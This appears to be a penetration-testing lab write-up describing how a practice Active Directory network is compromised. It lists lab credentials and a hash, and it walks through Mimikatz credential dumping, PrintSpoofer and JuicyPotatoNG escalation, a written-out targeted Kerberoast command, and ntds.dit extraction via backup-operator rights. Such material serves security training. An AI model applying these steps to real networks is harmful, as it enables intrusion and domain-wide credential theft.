Skip to content

Zeus

Network

Given:

  • 192.168.167.0/24

Found:

  • 192.168.167.158 DC
  • 192.168.167.159
  • 192.168.167.160

Creds

eric.wallows:EricLikesRunning800 (creds for .159)
db_user:Password123! (found in a file on .159)
o.foller:EarlyMorningFootball777 (retrieved using mimikatz from .159)
administrator:97db5c87465431b9091d47a58fe76483 (local admin on .160)
z.thomas:^1+>pdRLwyct]j,CYmyi (found in a document on .160)

Enumeration

Ping sweeping the subnet reveals three machines.

192.168.167.159

Enumeration

Initial Access

Using the provided credentials, we log in via WinRM.

Privilege Escalation

We can see that we have all permissions.

Transfer a reverse shell and JuicyPotatoNG, and we can get a system shell.

Post Exploitation

Get the proof

We see an SQL folder containing connection.sql with credentials db_user:Password123!.

Transfer adpeas.ps1, and we identify the DC.

Transfer Mimikatz, and we retrieve o.foller:EarlyMorningFootball777.

192.168.167.160 CLIENT02

Enumeration

Initial Access

Using the credentials for o.foller, we use PsExec to access the machine.

Privilege Escalation

We have all privileges, so we use PrintSpoofer.

Post Exploitation

Get the proof

Using Mimikatz, we only retrieve the administrator hash, which cannot be cracked with Hashcat.

In z.thomas's home folder, we find a Word document containing credentials:

z.thomas:^1+>pdRLwyct]j,CYmyi

192.168.167.158 DC

Enumeration

Initial Access

Use WinRM with z.thomas's credentials found on .160.

Get the flag

Privilege Escalation

Transfer SharpHound to the target, download the zip, and import it into BloodHound.

We see that z.thomas has GenericAll over d.chambers, who is a backup operator. Perform a targeted Kerberoast attack.

python targetedKerberoast.py -v -d 'zeus.corp' -u 'z.thomas' -p '^1+>pdRLwyct]j,CYmyi' --dc-ip 192.168.167.158

Hashcat cannot crack it, so we change it. Transfer powerview.ps1 to the machine.

Check with nxc and log in using Evil-WinRM.

d.chambers belongs to the backup operators group.

We can retrieve passwords using Robocopy.

First, transfer the script file (I had to duplicate end characters for the script to work).

Now retrieve the ntds.dit file using Robocopy.

Retrieve the SYSTEM file as well.

Download them to the Kali machine, and using secretsdump, we retrieve the domain admin's hash.

Post Exploitation

Using the hash, log in to the machine with Evil-WinRM.